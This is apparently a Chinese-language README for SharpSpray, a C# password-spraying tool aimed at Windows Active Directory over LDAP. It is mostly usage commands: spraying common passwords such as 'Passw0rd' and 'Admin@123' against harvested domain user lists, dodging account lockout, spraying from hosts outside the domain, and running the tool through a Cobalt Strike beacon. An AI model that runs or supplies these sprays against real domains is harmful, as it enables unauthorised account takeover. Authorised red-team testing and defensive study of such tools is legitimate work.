SharpSpray 是一款用 .NET C# 编写的 Windows 域密码喷洒工具。
SharpSpray 是 DomainPasswordSpray 的 C# 移植版本,并增强了额外功能。该工具使用 LDAP 协议与域活动目录服务进行通信。
> SharpSpray.exe --help
-v, --Verbose 显示详细消息。
-u (可选)用户名列表文件路径。如果未指定,将自动从活动目录获取。
-p 单个密码或用 '|' 分隔的密码列表,用于执行密码喷洒。
-k, --pl (可选)密码列表文件路径。
-d (可选)指定域名。
-m 如果从域上下文外部的主机进行喷洒,请使用此选项。
-q, --dc-ip 当选项 'm' (外部域) 被勾选时必须指定。
-x 尝试从用户列表中排除禁用帐户(不支持与选项 -m 一起使用)
-z 排除距离锁定还剩 1 次尝试的帐户(不支持与选项 -m 一起使用)
-f 自定义 LDAP 用户筛选器,例如 "(description=*admin*)"
-o 将结果输出到文件。
-w 不使用域锁定观察窗口设置,而使用此特定值(默认 32 分钟)。
-s (可选)每次身份验证尝试之间的延迟(秒)。
-j (可选)抖动(秒)。
--Force 强制启动,无需确认。
--get-users-list 从活动目录获取域用户列表。
--show-examples 从活动目录获取域用户列表。
--show-args 显示命令行参数
--help 显示此帮助屏幕。
SharpSpray.exe -v -x -z --pl password.txt
SharpSpray.exe -v -x -z -p "Passw0rd|Admin@123|Admin@2022"
SharpSpray.exe -v -x -z -p "Passw0rd"
SharpSpray.exe -x -z -u users.txt --pl psswd.txt
SharpSpray.exe -x -z -u users.txt -p Passw0rd!
SharpSpray.exe -x -z -s 3 -j 1 -u users.txt -k psswd.txt -o sprayed.txt
SharpSpray.exe -w 32 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe -w 32 -s 3 -j 1 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe --get-users-list
SharpSpray.exe --get-users-list > users.txt
PS> .\SharpSpray.exe --get-users-list | Out-File -Encoding ascii users.txt
* 在 Cobalt Strike 中使用:
beacon> execute-assembly C:\Users\sec\Desktop\tmp\sharpspray.exe --Force -w 32 -s 3 -j 1 -x -z -v -p "Passw0rd|Admin@123|Admin@2022"
* 检查 Cobalt 中的任务:
beacon> jobs
以下命令将获取域用户并将列表打印到控制台。
SharpSpray.exe -x -z --get-users-list
-x: 从用户列表中排除禁用帐户。
-z: 排除距离锁定还剩 1 次尝试的帐户。